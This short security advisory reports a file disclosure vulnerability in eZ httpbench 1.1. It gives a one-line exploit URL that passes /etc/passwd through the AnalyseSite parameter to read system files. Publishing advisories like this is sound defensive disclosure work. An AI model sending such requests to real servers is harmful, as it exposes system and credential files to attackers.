|
|
| |
| A security vulnerability in the product allows remote attackers to download any file on the local system that the eZ httpbench has read access to. |
| |
Credit:
The information has been provided by Tacettin Karadeniz.
|
| |
Vulnerable systems:
* eZ httpbench version 1.1
A vulnerability in eZ httpbench allows remote visitors to view any file on a web server.
Exploit:
http://www.web_sitesi/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
This will display the /etc/passwd (if the web server user has access to this file).
|
|
|